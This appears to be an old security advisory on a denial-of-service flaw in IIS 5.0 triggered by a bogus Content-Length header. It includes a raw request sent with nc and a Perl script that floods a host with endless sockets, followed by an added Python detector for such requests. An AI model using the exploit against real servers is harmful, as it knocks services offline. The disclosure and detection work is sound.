COMMAND

    IIS DoS

SYSTEMS AFFECTED

    IIS 5.0

PROBLEM

    Ivan Hernandez Puga posted:

    When you send a bad request to a Microsoft IIS/5.0 server it gives you the error and closes the connection, like when you fail to authenticate. Well... let's take a look at a normal request:

        GET /testfile HTTP/1.1
        Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
        Accept-Language: en-us
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
        Host: 192.168.0.10
        Connection: Keep-Alive
        Authorization: Basic

    And then let's add a "Content-Length: 5300643" field. When you send the new request to the server it hangs there waiting for something to happen and never closes the connection.

    Example exploit:

        $ cat "
        GET /testfile HTTP/1.1
        Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
        Accept-Language: en-us
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
        Host: 192.168.0.10
        Connection: Keep-Alive
        Content-Length: 5300643
        Authorization: Basic" >bogus.txt
        $ nc 192.168.0.10 80

    Update
    ======

    Exploit script by Ivan Hernandez:

        #!/usr/bin/perl
        # Written by Ivan Hernandez over code of Georgi Guninski
        use IO::Socket;

        print "IIS 5.0 Bogus Content-Length\n";

        $port = @ARGV[1];
        $host = @ARGV[0];

        $req="GET /ampgn HTTP/1.1
        Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
        Accept-Language: en-us
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
        Host: 192.168.0.10
        Connection: Keep-Alive
        Content-Length: 5300643
        Authorization: Basic " . "A" x 50000 . "\r\n\r\n";

        $i=0;
        while (1) {
            $socket[$i] = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP");
            syswrite($socket[$i],$req,length($req));
            print ".";
            $i++;
        }
        $i=0;
        print "\nDone.";

SOLUTION

    Nothing yet.
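
The hang described above follows a request whose Content-Length header announces a body that never arrives. As an added example (not part of the original advisory or its exploit code), the Python check below flags such requests in captured traffic. The 1,000,000-byte limit, the function names and the sample requests are assumptions constructed for illustration, and the "never sent" finding assumes the capture was taken after the connection went idle.

```python
# Added defensive example (not from the advisory): flag captured HTTP
# requests that declare a body they never send.
BODYLESS = {"GET", "HEAD"}   # methods that normally carry no body
MAX_DECLARED = 1_000_000     # assumed policy limit, in bytes

def parse_request(raw: bytes):
    """Split a raw request into (method, lower-cased headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method = lines[0].split(" ", 1)[0].upper()
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, headers, body

def check_request(raw: bytes):
    """Return findings for one captured request; an empty list is clean."""
    method, headers, body = parse_request(raw)
    cl = headers.get("content-length")
    if cl is None:
        return []
    if not (cl.isascii() and cl.isdigit()):
        return ["malformed Content-Length"]
    declared, findings = int(cl), []
    if method in BODYLESS and declared > 0:
        findings.append(f"{method} declares a {declared}-byte body")
    if declared > MAX_DECLARED:
        findings.append("declared length exceeds policy limit")
    if declared > len(body):
        findings.append(f"{declared - len(body)} body bytes never sent")
    return findings

# Constructed samples modelled on the requests shown in the advisory.
NORMAL = (b"GET /testfile HTTP/1.1\r\nHost: 192.168.0.10\r\n"
          b"Connection: Keep-Alive\r\n\r\n")
BOGUS = (b"GET /testfile HTTP/1.1\r\nHost: 192.168.0.10\r\n"
         b"Connection: Keep-Alive\r\nContent-Length: 5300643\r\n\r\n")
POST_OK = (b"POST /form HTTP/1.1\r\nHost: 192.168.0.10\r\n"
           b"Content-Length: 5\r\n\r\nhello")

if __name__ == "__main__":
    for name, raw in (("normal", NORMAL), ("bogus", BOGUS), ("post", POST_OK)):
        print(name, check_request(raw))
```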